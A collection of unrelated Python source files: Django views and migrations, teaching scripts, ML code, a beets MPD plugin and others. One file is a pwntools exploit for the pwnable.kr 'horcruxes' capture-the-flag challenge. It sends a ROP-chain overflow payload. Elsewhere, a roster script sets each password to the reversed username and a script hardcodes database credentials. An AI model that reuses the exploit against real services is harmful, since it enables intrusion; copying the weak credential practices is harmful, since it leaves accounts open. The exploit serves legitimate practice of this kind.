        cutoff = cutoff.replace(day=1)
        qs = models.Transaction.objects.filter(
            account__owner=self.request.user,
            transaction_category__category_type=type,
            date__gte=cutoff
        )
        return json.dumps(qs_to_monthly_report(qs, type))
    def get_context_data(self, **kwargs):
        """Add 'outgoings' and 'income' JSON series to the template context."""
        ctx = super(MonthlyTransactionsView, self).get_context_data(**kwargs)
        ctx['outgoings'] = self.get_report_by_type(
            models.TransactionCategory.OUTGOINGS
        )
        ctx['income'] = self.get_report_by_type(
            models.TransactionCategory.INCOME
        )
        return ctx
|
# Generated by Django 3.2 on 2021-05-07 17:15
from django.db import migrations
class Migration(migrations.Migration):
    """Rename concatenated field names on Equipo and Ticket to snake_case.

    RenameField is schema-only renaming: column data is preserved.
    """
    dependencies = [
        ('myapp', '0004_auto_20210505_1940'),
    ]
    operations = [
        migrations.RenameField(
            model_name='equipo',
            old_name='fecha_puestaenmarcha',
            new_name='fecha_puesta_en_marcha',
        ),
        migrations.RenameField(
            model_name='equipo',
            old_name='numerodeserie',
            new_name='numero_de_serie',
        ),
        migrations.RenameField(
            model_name='equipo',
            old_name='tipoequipo',
            new_name='tipo_equipo',
        ),
        migrations.RenameField(
            model_name='ticket',
            old_name='numeroreferencia',
            new_name='numero_referencia',
        ),
    ]
|
#bubble sort
import random
import math
# 1. an outer loop decreases in size each time
# 2. the goal is to have the largest no. at the end of the list when outer loop completes 1 cycle
# 3. the inner loop starts comparing indexes at the begining of the loop
# 4. check if list[Index] > list[Index + 1]
# 5. if so swap the index values
# 6. when inner loop completes the largest no is at the end of the list
# 7. decrement the outer loop by 1
numList = []  # build a list of 5 random ints in [1, 9]
for i in range(5):
    numList.append(random.randrange(1, 10))
i = len(numList) - 1  # index of the last unsorted position
# BUG FIX: the outer loop previously ran only while i > 1, which skipped the
# final pass (i == 1) comparing indexes 0 and 1, so the first two elements
# could be left out of order.  It must run down to i == 1.
while i > 0:  # outer loop: after each pass the largest value sits at index i
    j = 0
    while j < i:  # inner loop: compare adjacent pairs, bubbling the max up
        print("\n Is {} > {}" .format(numList[j], numList[j + 1]))
        if numList[j] > numList[j + 1]:
            print("switch")  # basic debugging
            numList[j], numList[j + 1] = numList[j + 1], numList[j]  # swap
        else:
            print("nothing switched")
        j += 1
    # show the list after each full pass
    for k in numList:
        print(k, end="")
    print()
    print("end of round")
    i -= 1
for k in numList:
    print(k, end=",")
print()
|
# -*- coding: utf-8 -*-
"""
Query data download (export) functionality.
"""
import os
import datetime
import base64
import logging
import json
from sys import stderr
from django.conf import settings
from django.utils.text import get_valid_filename
from .tasks import zipquerydata
logger = logging.getLogger(__name__)
def create_zipname(user, query):
    """Build a filesystem-safe base name for the export zip.

    Combines the requesting user's name, the query title and the query's
    creation timestamp, then strips anything invalid in a filename.
    """
    timestamp = query.date_created.strftime('%Y.%m.%d-%H.%M.%S')
    raw_name = '_'.join([user.username, query.title, timestamp])
    return get_valid_filename(raw_name)
def execute(query, req_dict, zip_basename, to_email, email_message):
    """Expire old exports, then run the zip-and-email task for *query*.

    The request parameters plus the query's own parameters are serialised
    to JSON, base64-encoded, and handed to the zipquerydata task.
    Returns the relative download path that was logged.

    BUG FIX: converted Python 2 ``print >> stderr`` statements (a
    SyntaxError on Python 3) to print() calls, and encoded the JSON string
    to bytes before base64-encoding (b64encode requires bytes on Python 3).
    """
    if settings.DEBUG:
        print("execute()", file=stderr)
    logger.debug("%s: %s" % (__name__, "execute()"))
    if settings.QUERY_DATA_DELETE_DATA:
        expire_data()  # delete old download files first
    # add the request parameters
    req_dict['zip_basename'] = zip_basename
    req_dict['to_email'] = to_email
    req_dict['email_message'] = email_message
    req_dict.update(query.get_query_dict())
    if settings.DEBUG:
        print(req_dict, file=stderr)
    # convert to base64
    req_str = json.dumps(req_dict)
    req_base64 = base64.b64encode(req_str.encode('utf-8'))
    if settings.DEBUG:
        print(req_base64, file=stderr)
    if settings.DEBUG:
        print('Calling zipquerydata\n')
    zipquerydata(req_base64)
    msg = 'management/download/'  # - Celery task id: {}'.format(task.id)
    logger.info(msg)
    return msg
def expire_data():
    """Delete export files older than ``QUERY_DATA_EXPIRE_DAYS`` from the
    download folder.  No-op when the folder does not exist.

    BUG FIX: converted Python 2 ``print >> stderr`` statements (a
    SyntaxError on Python 3) to print() calls; logic unchanged.
    """
    msg = "%s: %s" % (__name__, "expire_data()")
    logger.debug(msg)
    if settings.DEBUG:
        print("expire_data()", file=stderr)
    ddir = settings.QUERY_DATA_DOWNLOAD_PATH
    if settings.DEBUG:
        print("download path:", ddir, file=stderr)
    time_now = datetime.datetime.now()
    if settings.DEBUG:
        print("time_now:", time_now, file=stderr)
    # Don't try to delete files if folder doesn't exist
    if not os.path.exists(ddir):
        return
    files = os.listdir(ddir)
    files.sort()
    for fname in files:
        if settings.DEBUG:
            print(fname, file=stderr)
        fpath = os.path.join(ddir, fname)
        if settings.DEBUG:
            print(fpath, file=stderr)
        # NOTE: getctime is inode-change time on Unix, not creation time.
        time_created_float = os.path.getctime(fpath)
        time_created = datetime.datetime.fromtimestamp(time_created_float)
        if settings.DEBUG:
            print("time_created: %s" % time_created, file=stderr)
        elapsed = time_now - time_created
        if settings.DEBUG:
            print("elapsed: %s" % elapsed, file=stderr)
        if elapsed.days >= settings.QUERY_DATA_EXPIRE_DAYS:
            msg = "deleting query data file: %s" % fpath
            logger.debug(msg)
            if settings.DEBUG:
                print(msg, file=stderr)
            try:
                os.remove(fpath)  # DELETING QUERY DATA DOWNLOAD FILE
            except Exception as e:
                # Best-effort: log and keep going with the remaining files.
                msg = "deleting query data file failed: %s" % str(e)
                logger.debug(msg)
                if settings.DEBUG:
                    print(msg, file=stderr)
        else:
            msg = "keeping query data file: %s" % fpath
            logger.debug(msg)
            if settings.DEBUG:
                print(msg, file=stderr)
|
# Read three integers and report whether at least one of them is positive.
A = int(input("A= "))
B = int(input("B= "))
C = int(input("C= "))
print(any(number > 0 for number in (A, B, C)))
import torch
from torch import nn
from torch.nn import functional as F
class DiceCELoss(nn.Module):
    """Combined soft-Dice + cross-entropy loss for multi-class prediction.

    ``forward(inputs, targets)`` expects ``inputs`` of shape
    (batch, num_classes, *spatial) and integer ``targets`` of shape
    (batch, *spatial); it returns mean(1 - dice over present classes) plus
    the standard cross-entropy.
    """

    def __init__(self):
        super(DiceCELoss, self).__init__()

    def forward(self, inputs, targets, smooth=1e-7):
        """Return the scalar Dice+CE loss; *smooth* stabilises empty classes."""
        ce_loss = F.cross_entropy(inputs, targets)
        # Class probabilities (log-softmax then exp == softmax).
        probs = inputs.log_softmax(dim=1).exp()
        batch = targets.size(0)
        n_classes = inputs.size(1)
        reduce_dims = (0, 2)
        flat_targets = targets.view(batch, -1)
        flat_probs = probs.view(batch, n_classes, -1)
        # One-hot encode targets and move classes to dim 1 to match probs.
        one_hot = F.one_hot(flat_targets, n_classes).permute(0, 2, 1)
        intersection = torch.sum(flat_probs * one_hot, dim=reduce_dims)
        cardinality = torch.sum(flat_probs + one_hot, dim=reduce_dims)
        dice = (2.0 * intersection + smooth) / (cardinality + smooth)
        dice_loss = 1 - dice
        # Only classes actually present in the targets contribute.
        present = one_hot.sum(reduce_dims) > 0
        dice_loss = dice_loss * present.to(dice_loss.dtype)
        return dice_loss.mean() + ce_loss
# Generated by Django 2.0.2 on 2018-02-25 00:40
from django.conf import settings
from django.db import migrations
class Migration(migrations.Migration):
    """Rename Article.author_id to the conventional 'author' FK name and
    enforce that each author's article titles are unique."""
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('articles', '0002_auto_20180224_1438'),
    ]
    operations = [
        migrations.RenameField(
            model_name='article',
            old_name='author_id',
            new_name='author',
        ),
        migrations.AlterUniqueTogether(
            name='article',
            unique_together={('author', 'title')},
        ),
    ]
|
#!/usr/bin/python3.4
# -*-coding:Utf-8
from random import randrange
from math import ceil
def couleur(cagnotte, mise):
    """Return the new bankroll after a parity ("couleur") win.

    The stake is paid back at 1.5x; the result is rounded up to the next
    whole unit.
    """
    gain = mise * 1.5
    nouvelle_cagnotte = ceil(cagnotte - mise + gain)
    print("Not bad x1.5")
    return nouvelle_cagnotte
# Roulette-style game: bet on a number 0-49.  Exact number pays x3, same
# parity pays x1.5 (via couleur), otherwise the stake is lost.
try:
    # BUG FIX: the original called int(...) on each input but discarded the
    # result, leaving the values as strings, so every numeric comparison
    # below raised TypeError on Python 3.  The conversions are now assigned.
    cagnotte = int(input("Combien êtes vous prêt à jouer ... en $"))
    assert cagnotte > 0
    print("Ok commençons")
    while cagnotte > 0:
        mise = int(input("Combien misez vous ?"))
        if mise <= 0:
            print("Pariez 0 ou un nombre négatif STOP le jeu")
            break
        if mise > cagnotte:
            print("Pas assez de money broo...")
            continue
        bet = int(input("Sur quel numéro ?"))
        if bet < 0 or bet > 49:
            print("Pariez sur un nombre entre 0 et 49")
            continue
        result = randrange(50)
        print("Le croupiez a tire le ...")
        print(result)
        if result == bet:
            # exact hit: stake returned at x3
            cagnotte = cagnotte - mise + (mise * 3)
            print("Bingo x3")
        elif (bet % 2 == 0) and (result % 2 == 0):
            cagnotte = couleur(cagnotte, mise)
        elif (bet % 2 != 0 and result % 2 != 0):
            cagnotte = couleur(cagnotte, mise)
        else:
            cagnotte = cagnotte - mise
            print("Dommage...")
        print("cagnotte =")
        print(cagnotte)
        result = 0
        stop = int(input("Souhaitez-vous quitter le casino oui => 1 si non => 0 ? "))
        if stop == 1:
            print("Bye bye")
            break
        elif stop == 0:
            continue
        else:
            print("Je n'ai pas compris votre reponse ... continuons")
    if cagnotte == 0:
        print("Sorry you loose all your money")
    else:
        print("Your money is :", cagnotte)
except AssertionError:
    print("Cagnotte doit être positive")
except ValueError:
    # int() on non-numeric input: the Python 3 equivalent of the NameError /
    # SyntaxError raised by Python 2's eval-based input(), which the two
    # handlers below were written for.
    print("Vous n'avez pas saisi de nombre")
except NameError:
    print("Vous n'avez pas saisi de nombre")
except SyntaxError:
    print("Saisissez un nombre correct")
|
#!/usr/bin/python3
from math import floor, sqrt
import sys
import mysql.connector
def BinaryTree(r):
    """Create a leaf node represented as [value, left_subtree, right_subtree]."""
    return [r, list(), list()]
def insertLeft(root, newBranch):
    """Insert *newBranch* as the left child of *root* (in place).

    An existing left subtree is pushed down to become the left child of the
    new node.  Returns *root* for chaining.
    """
    existing = root.pop(1)
    has_subtree = len(existing) > 1
    new_node = [newBranch, existing if has_subtree else [], []]
    root.insert(1, new_node)
    return root
def insertRight(root, newBranch):
    """Insert *newBranch* as the right child of *root* (in place).

    An existing right subtree is pushed down to become the right child of
    the new node.  Returns *root* for chaining.
    """
    existing = root.pop(2)
    has_subtree = len(existing) > 1
    new_node = [newBranch, [], existing if has_subtree else []]
    root.insert(2, new_node)
    return root
def getLeftChild(root):
    """Return the left subtree (index 1) of *root*."""
    left_subtree = root[1]
    return left_subtree
def getRightChild(root):
    """Return the right subtree (index 2) of *root*."""
    right_subtree = root[2]
    return right_subtree
def print_leaves(root):
    """Print the value of every leaf under *root*, one per line, left to right."""
    left, right = root[1], root[2]
    if not left and not right:
        print(str(root[0]))
    else:
        print_leaves(left)
        print_leaves(right)
def is_prime(num):
    """Trial-division primality check (prints a trace line per call).

    Even inputs are probed with every candidate from 2; odd inputs with odd
    candidates from 3.  Note: preserves the original quirk of reporting 1
    as prime (no candidate <= sqrt(1) is ever tried).
    """
    print('checking whether prime: ' + str(num))
    if num % 2 == 0:
        divisor, step = 2, 1
    else:
        divisor, step = 3, 2
    limit = floor(sqrt(num))
    result = True
    while divisor <= limit:
        if num % divisor == 0:
            result = False
            break
        divisor += step
    return result
def get_smallest_divisor(num):
    """Return the smallest divisor of *num* that is >= 2.

    For a prime this is *num* itself; for num < 2 no candidate is tried and
    None is returned implicitly.
    """
    for candidate in range(2, num + 1):
        if num % candidate == 0:
            return candidate
def get_prime_factors(num, root, list_of_factors):
    """Recursively build a factor tree at *root* and collect prime factors.

    Appends each prime factor of *num* to *list_of_factors*, mutating
    *root* into a tree whose leaves are the prime factors.  Prints trace
    output (the current root value and its leaves) at every split.
    """
    if is_prime(num):
        list_of_factors.append(num)
        return
    divisor = get_smallest_divisor(num)
    quotient = num // divisor
    insertLeft(root, divisor)
    insertRight(root, quotient)
    print(str(root[0]))
    print_leaves(root)
    get_prime_factors(divisor, getLeftChild(root), list_of_factors)
    get_prime_factors(quotient, getRightChild(root), list_of_factors)
def main():
    """Factor the integer given on the command line and record completion.

    argv[1] is the user name, argv[2] the integer to factor (also used as
    the output file name and the DB key).  All print output — including the
    trace from the factoring helpers — is redirected into the user's file,
    then the matching row in test.files is marked complete.
    """
    user_name = sys.argv[1]
    integer_to_factor = sys.argv[2]
    output_file = '/var/www/html/UserFiles/' + user_name + '/' +\
        integer_to_factor + '.txt'
    # Redirect all subsequent prints (helpers included) to the user's file.
    sys.stdout = open(output_file, 'a')
    num = int(integer_to_factor)
    my_tree = BinaryTree(num)
    list_of_fac = []
    get_prime_factors(num, my_tree, list_of_fac)
    print('\n')
    print_leaves(my_tree)
    conn = mysql.connector.connect(host='localhost', database='test',
                                   user='web', password='sesame')
    cursor = conn.cursor()
    # need to do WHERE user_id = ..., since file_name is not unique to user
    query = "UPDATE test.files SET complete = 1 WHERE file_name = %s"
    cursor.execute(query, [integer_to_factor])
    conn.commit()
    cursor.close()
    conn.close()


if __name__ == '__main__':
    # BUG FIX: main() previously ran unconditionally, so merely importing
    # this module kicked off the factoring job and DB update.
    main()
|
import numpy as np
import cv2
def convex():
    """OpenCV shape-fitting demo.

    Loads images/lightning.png, takes one contour and draws its minimum
    enclosing circle, best-fit ellipse and best-fit line, then shows the
    result in a window until a key is pressed.

    NOTE(review): the 3-value unpacking of findContours is the OpenCV 3.x
    API (2.x/4.x return two values) — confirm the pinned cv2 version.
    `contours[4]` assumes the thresholded image yields at least 5 contours.
    """
    img = cv2.imread('images/lightning.png')
    imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    rows, cols = img.shape[:2]
    ret, thr = cv2.threshold(imgray, 127, 255, 0)
    _, contours, _ = cv2.findContours(thr, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    cnt = contours[4]
    (x,y), r = cv2.minEnclosingCircle(cnt)
    # Circle circumscribing the contour: returns the centre and radius.
    center = (int(x), int(y))
    r = int(r)
    cv2.circle(img, center, r, (255, 0, 0), 3)
    ellipse = cv2.fitEllipse(cnt)
    # Best-fitting ellipse around the contour.
    cv2.ellipse(img, ellipse, (0, 255, 0), 3)
    [vx, vy, x, y] = cv2.fitLine(cnt, cv2.DIST_L2, 0, 0.01, 0.01)
    # Extend the fitted line (point (x, y) + direction (vx, vy)) across the
    # full image width: y-intercepts at column 0 and column cols-1.
    ly = int((-x*vy/vx)+y)
    ry = int(((cols-x)*vy/vx)+y)
    cv2.line(img, (cols-1, ry), (0, ly), (0,0,255), 2)
    cv2.imshow('fitting', img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()
convex()
|
# coding=UTF-8
from numpy import *
import random
import operator
import string
bug_rate = 0.20
#read_file = "C:/Users/Chris/Desktop/7.lang3.0.1_all.csv"
#save_file = "C:/Users/Chris/Desktop/7.lang3.0.1_all.csv"
def chang_array(inputs):
    """Parse one CSV data line into a numpy vector.

    The first comma-separated field (a name/label) is skipped; every field
    between subsequent commas is parsed as a float, and the character two
    positions before the end of the line (the defect flag, just before the
    trailing newline) is appended as an int.
    """
    line = inputs
    values = []
    start = 0  # start index of the current field; 0 means "before first comma"
    for position in range(len(line)):
        if position == len(line) - 2:
            values.append(int(line[position]))
        if line[position] == ',':
            if start == 0:
                start = position + 1  # skip the leading name field
            else:
                values.append(float(line[start:position]))
                start = position + 1
    return array(values)
# Euclidean distance computation.
def get_deances(inputs1, inputs2):
    """Return the Euclidean distance between two equal-length numeric vectors."""
    squared_gap = (inputs1 - inputs2) ** 2
    return squared_gap.sum() ** 0.5
def made_bug(bug_inputs_vector, all_inputs_vector):
    """Synthesise one new defective sample (MORPH-style).

    Picks a random defective vector, finds the nearest clean vector by
    Euclidean distance (last index on ties, as in the original), then
    perturbs the defective vector along the difference:
    Yi = |Xi + (Xi - Zi) * r| with r = 0.15.
    """
    chosen = bug_inputs_vector[random.randrange(0, len(bug_inputs_vector))]
    distances = [get_deances(chosen, clean) for clean in all_inputs_vector]
    best = min(distances)
    nearest = 0
    for idx, dist in enumerate(distances):
        if dist == best:
            nearest = idx  # keep the LAST index matching the minimum
    offset = chosen - all_inputs_vector[nearest]
    candidate = chosen + offset * 0.15
    # (x**2)**0.5 == |x|: keep every metric non-negative.
    return (candidate ** 2) ** 0.5
def MORPH_function(bug_rate, read_file, save_file):
    """Oversample defective rows until the defect ratio reaches *bug_rate*,
    appending the synthesised rows to *save_file*.

    Fixes vs. the original:
    - Python 2 ``print`` statements (SyntaxError on Python 3) converted to
      print() calls.
    - The input file is opened read-only and closed via ``with`` (it was
      opened 'a+' and leaked; 'a+' also leaves the initial read position
      implementation-defined).
    - The output file is opened once instead of once per synthesised row.
    """
    with open(read_file, 'r') as f:
        print(f.readline())  # header row
        bug_inputs = []         # raw lines flagged as defective
        bug_inputs_vector = []  # parsed defective rows (numpy vectors)
        all_inputs = []         # raw clean lines
        all_inputs_vector = []  # parsed clean rows
        count = 0
        count_bug = 0
        skipped = 0
        for line in f:
            # The original skipped the first two iterated lines with two
            # separate one-shot counters; behaviour preserved here.
            if skipped < 2:
                skipped += 1
                continue
            count += 1
            # The defect flag is the character just before the newline.
            if line[len(line) - 2] != '0':
                count_bug += 1
                bug_inputs.append(line)
                bug_inputs_vector.append(chang_array(line))
            else:
                all_inputs.append(line)
                all_inputs_vector.append(chang_array(line))
    new_bug_list = []
    print(len(all_inputs_vector))
    # NOTE(review): strict inequality can loop forever if the rounded ratio
    # steps over bug_rate without hitting it exactly; preserved as-is, but
    # consider '<' instead of '!='.
    while round(float(len(bug_inputs_vector)) / len(all_inputs_vector), 2) != bug_rate:
        new_bug = made_bug(bug_inputs_vector, all_inputs_vector)
        bug_inputs_vector.append(new_bug)
        new_bug_list.append(new_bug)
    bug_name_str = "lang\WordUtils.java\org.apache.commons.lang.WordUtils,"
    with open(save_file, 'a+') as w:
        for vector in new_bug_list:
            rounded = [round(float(value), 2) for value in vector]
            as_str = str(rounded)
            # str([...]) minus the surrounding brackets -> CSV-ish row body.
            out_bug_str = as_str[1:len(as_str) - 1]
            w.write(bug_name_str + out_bug_str + '\n')
    return
|
import unittest
from flask import current_app
from app import app, db
import os
class TestOnApp(unittest.TestCase):
    """Sanity checks for the application's configuration."""

    def setUp(self):
        # Push an application context so `current_app` is bound in tests.
        self.app = app
        self.app_context = self.app.app_context()
        self.app_context.push()

    def tearDown(self):
        # Drop the context pushed by setUp().
        self.app_context.pop()

    def test_app_exists(self):
        # current_app only resolves inside an application context.
        self.assertIsNotNone(current_app)

    def test_valid_secret_key(self):
        # The SECRET_KEY env variable must differ from the unsafe default.
        self.assertNotEqual(current_app.config["SECRET_KEY"],
                            "hard to guess string")
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
# Resolve the addresses of the seven "horcrux" routines (A..G) from the
# binary's symbol table; the ROP chain below returns into each in turn so
# every EXP value is printed.
elf = ELF('horcruxes')
A = elf.symbols['A']
B = elf.symbols['B']
C = elf.symbols['C']
D = elf.symbols['D']
E = elf.symbols['E']
F = elf.symbols['F']
G = elf.symbols['G']
# NOTE(review): hard-coded address that re-enters ropme() — specific to
# this binary build; confirm against the target.
call_ropme = 0x0809fffc
def parse_exp(output: str) -> int:
    """Sum the EXP values printed by the horcrux routines.

    Each relevant line looks like:
        You found "Tom Riddle's Diary" (EXP +833130388)
    The first and last lines of *output* are menu noise and are skipped.
    """
    total = 0
    for line in output.split('\n')[1:-1]:
        print(line)
        token = line.rsplit(' ', 1)[1]  # e.g. '+833130388)'
        total += int(token[1:-1])       # drop the sign char and ')'
    return total
if __name__ == '__main__':
    # Connect to the challenge host, then to the local vulnerable service.
    shell = ssh(host='pwnable.kr', user='horcruxes', password='guest', port=2222)
    proc = shell.run('nc 0 9032') # according to the readme file
    # 120 filler bytes (presumably padding up to the saved return address
    # — confirm offset), then a ROP chain through A..G, finally back into
    # ropme() so we can answer with the summed EXP.
    payload = 30 * b'AAAA'
    payload += p32(A)
    payload += p32(B)
    payload += p32(C)
    payload += p32(D)
    payload += p32(E)
    payload += p32(F)
    payload += p32(G)
    payload += p32(call_ropme) # return to main() and call ropme()
    proc.recvuntil('Select Menu:')
    proc.sendline('6')
    proc.recvuntil('How many EXP')
    proc.sendline(payload)
    output = proc.recvuntil('Select Menu:')
    proc.sendline('6')
    # Sum up all exp points.
    exp_sum = parse_exp(output.decode('utf-8'))
    print("total exp: {}".format(exp_sum))
    # Answering with the exact sum makes the service reveal the flag.
    proc.recvuntil('How many EXP did you earned?')
    proc.sendline(str(exp_sum))
    proc.interactive()
    shell.close()
|
from __future__ import print_function
import sys
import os
import requests
import logging
import json
from os.path import dirname
from jsonschema import validate
import importlib
import pkgutil
from halocli.util import Util
logger = logging.getLogger(__name__)
# Configure the root logger once at import time so plugin output is visible.
logging.root.setLevel(logging.INFO)
class PluginError(Exception):
    """Raised for failures specific to the validate plugin."""
    pass
class Plugin():
    """Halo CLI plugin that validates a project settings file.

    Declares the ``test`` and ``valid`` commands and hooks into the
    ``valid`` lifecycle events.
    """

    def __init__(self, halo):
        """Store the halo context and declare commands and hooks.

        halo: the CLI framework object (provides ``settings`` and ``cli``).
        """
        self.halo = halo
        #init work on halo config
        #if self.halo.config ...
        self.name = 'validate'
        self.desc = 'validate settings file'
        # set commands
        self.commands = {
            'test': {
                'usage': "test this for your HALO project",
                'lifecycleEvents': ['resources', 'functions']
            },
            'valid': {
                'usage': "do this for your HALO project",
                'lifecycleEvents': ['resources', 'functions'],
                'options': {
                    'service': {
                        'usage': 'Name of the service',
                        'required': True,
                        'shortcut': 's'
                    }
                },
            },
        }
        # set hooks
        self.hooks = {
            'before:valid:resources': self.before_valid_resources,
            'valid:resources': self.valid_resources,
            'after:valid:functions': self.after_valid_functions,
        }

    def run_plugin(self, options):
        """Remember the CLI options for later hook invocations."""
        self.options = options

    def before_valid_resources(self):
        """Hook placeholder: nothing to prepare before validation."""
        pass

    def valid_resources(self):
        """Validate the settings for the service named in the options.

        Returns Util.valid()'s status code (0 on success).
        Raises Exception when no 'service' option was supplied.
        """
        service = None
        if getattr(self, 'options', None):
            # each option is expected to be a mapping; the last 'service'
            # entry wins (assumes list-of-dicts — confirm with the caller)
            for o in self.options:
                if 'service' in o:
                    service = o['service']
        if not service:
            raise Exception("no service found")
        ret = Util.valid(self.halo.settings, service)
        if ret == 0:
            # fixed message typo (was "finished valid seccessfuly")
            self.halo.cli.log("finished valid successfully")
        return ret

    def after_valid_functions(self):
        """Hook run after validation; brief pause before control returns."""
        import time
        time.sleep(1)
|
import sys
import os
import json
import nltk
import pickle
import torch
import torch.nn.functional as F
import matplotlib.pyplot as plt
plt.switch_backend('agg')
import matplotlib.ticker as ticker
import numpy as np
def main():
    """Visualize LSTM attention between the last dialogue-context
    utterance and the correct answer of the first validation example.

    sys.argv[1]: directory containing 'valid.json' and 'embedding.pkl'.
    Writes the heat map to 'atten_visualize.png'.

    NOTE(review): the Embedding and LSTM below are freshly constructed
    with random weights (no checkpoint is loaded), so the figure shows
    the pipeline's structure, not trained attention — confirm intent.
    """
    data_path = os.path.join(sys.argv[1], 'valid.json')
    with open(data_path) as f:
        data = json.load(f)
    embedding_path = os.path.join(sys.argv[1], 'embedding.pkl')
    with open(embedding_path, 'rb') as f:
        embedding = pickle.load(f)
    # last utterance of the dialogue so far vs. the gold answer utterance
    contexts = data[0]['messages-so-far'][-1]['utterance']
    contexts = nltk.word_tokenize(contexts)
    options = data[0]['options-for-correct-answers'][-1]['utterance']
    options = nltk.word_tokenize(options)
    contexts_e = []
    options_e = []
    for context in contexts:
        contexts_e.append(embedding.to_index(context))
    for option in options:
        options_e.append(embedding.to_index(option))
    contexts_e = torch.tensor(contexts_e)
    options_e = torch.tensor(options_e)
    embed = torch.nn.Embedding(embedding.vectors.size(0),
                               embedding.vectors.size(1))
    contexts_e = embed(contexts_e)
    contexts_e = torch.unsqueeze(contexts_e, 0)
    options_e = embed(options_e)
    options_e = torch.unsqueeze(options_e, 0)
    lstm = torch.nn.LSTM(300, 128, batch_first=True, bidirectional=True)
    context_lstm, (h_n, c_n) = lstm(contexts_e)
    option_lstm, (h_n, c_n) = lstm(options_e)
    # attention scores: dot product of every option step with every context step
    atten = torch.bmm(option_lstm, context_lstm.transpose(1, 2))
    atten_soft = F.softmax(atten, dim=2)
    atten_soft = torch.squeeze(atten_soft)
    fig = plt.figure()
    ax = fig.add_subplot(111)
    cax = ax.matshow(atten_soft.detach().numpy(), cmap='bone')
    fig.colorbar(cax)
    # NOTE(review): matshow tick labelling usually needs a leading dummy
    # label or an offset locator; the labels here may be shifted by one.
    ax.set_xticklabels(contexts, rotation=45)
    ax.set_yticklabels(options)
    ax.xaxis.set_major_locator(ticker.MultipleLocator(1))
    ax.yaxis.set_major_locator(ticker.MultipleLocator(1))
    plt.savefig("atten_visualize.png")
if __name__ == "__main__":
    # ensure the tokenizer model is present before main() runs
    nltk.download("punkt")
    main()
|
# Read n numbers and print the larger of (sum at even indices,
# sum at odd indices).
count = int(input())
nums = list(map(int, input().split()))
even_total = 0
odd_total = 0
for idx in range(count):
    if idx % 2 != 0:
        odd_total += nums[idx]
    else:
        even_total += nums[idx]
print(max(even_total, odd_total))
|
from Auth import Auth
# Bulk-create accounts from the student roster CSV.
auth = Auth("auth_info.json")
user_csv = open("student_info.csv", "r")
user_csv.readline()  # skip the header row
for line in user_csv:
    split = line.split(",")
    username = split[2][1:-1]  # third column, surrounding quotes stripped
    # SECURITY NOTE(review): password is just the reversed username —
    # trivially guessable; confirm this is only for a throwaway sandbox.
    password = username[::-1]
    auth.create_user(username, password)
|
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Updates an MPD index whenever the library is changed.
Put something like the following in your config.yaml to configure:
mpd:
host: localhost
port: 6600
password: seekrit
"""
from beets.plugins import BeetsPlugin
import os
import socket
from beets import config
# No need to introduce a dependency on an MPD library for such a
# simple use case. Here's a simple socket abstraction to make things
# easier.
class BufferedSocket:
    """Socket abstraction that allows reading by line."""

    def __init__(self, host, port, sep=b'\n'):
        # A host starting with '/' or '~' names a UNIX domain socket path.
        if host[0] in ['/', '~']:
            self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            self.sock.connect(os.path.expanduser(host))
        else:
            self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.sock.connect((host, port))
        self.buf = b''
        self.sep = sep

    def readline(self):
        """Return one separator-terminated chunk (separator included), or
        b'' if the peer closed before a full line arrived."""
        while True:
            if self.sep in self.buf:
                line, _, self.buf = self.buf.partition(self.sep)
                return line + self.sep
            data = self.sock.recv(1024)
            if not data:
                return b''
            self.buf += data

    def send(self, data):
        """Write raw bytes to the peer."""
        self.sock.send(data)

    def close(self):
        """Close the underlying socket."""
        self.sock.close()
class MPDUpdatePlugin(BeetsPlugin):
    """Ask a running MPD server to rescan its database whenever the beets
    library changes (one ``update`` command, sent on CLI exit)."""

    def __init__(self):
        super().__init__()
        config['mpd'].add({
            'host': os.environ.get('MPD_HOST', 'localhost'),
            'port': int(os.environ.get('MPD_PORT', 6600)),
            'password': '',
        })
        config['mpd']['password'].redact = True

        # For backwards compatibility, use any values from the
        # plugin-specific "mpdupdate" section.
        for key in config['mpd'].keys():
            if self.config[key].exists():
                config['mpd'][key] = self.config[key].get()

        self.register_listener('database_change', self.db_change)

    def db_change(self, lib, model):
        # Defer the actual update to CLI exit so a batch of changes
        # triggers only one MPD rescan.
        self.register_listener('cli_exit', self.update)

    def update(self, lib):
        self.update_mpd(
            config['mpd']['host'].as_str(),
            config['mpd']['port'].get(int),
            config['mpd']['password'].as_str(),
        )

    def update_mpd(self, host='localhost', port=6600, password=None):
        """Sends the "update" command to the MPD server indicated,
        possibly authenticating with a password first.
        """
        self._log.info('Updating MPD database...')

        try:
            s = BufferedSocket(host, port)
        except OSError as e:
            self._log.warning('MPD connection failed: {0}',
                              str(e.strerror))
            return

        resp = s.readline()
        if b'OK MPD' not in resp:
            self._log.warning('MPD connection failed: {0!r}', resp)
            # bug fix: previously the socket leaked on this path
            s.close()
            return

        if password:
            s.send(b'password "%s"\n' % password.encode('utf8'))
            resp = s.readline()
            if b'OK' not in resp:
                self._log.warning('Authentication failed: {0!r}', resp)
                s.send(b'close\n')
                s.close()
                return

        s.send(b'update\n')
        resp = s.readline()
        # Bug fix: close the connection on every path and only log success
        # when the server actually started updating (previously 'Database
        # updated.' was logged even after a failure, and the socket was
        # never closed on success).
        updated = b'updating_db' in resp
        if not updated:
            self._log.warning('Update failed: {0!r}', resp)
        s.send(b'close\n')
        s.close()
        if updated:
            self._log.info('Database updated.')
|
import io
import os
import csv
import typing
import logging
import datetime
import traceback
class InvertedFilter(logging.Filter):
    """Allow all records except those with the given `name`.

    This inverts ``logging.Filter``: a record is dropped when its logger
    name equals ``name`` exactly, and passed otherwise.  Note that unlike
    the base class no parent-logger (prefix) matching is performed.
    """
    # The redundant __init__ override (which only called super().__init__)
    # has been removed; the inherited constructor is used directly.

    def filter(self, record):
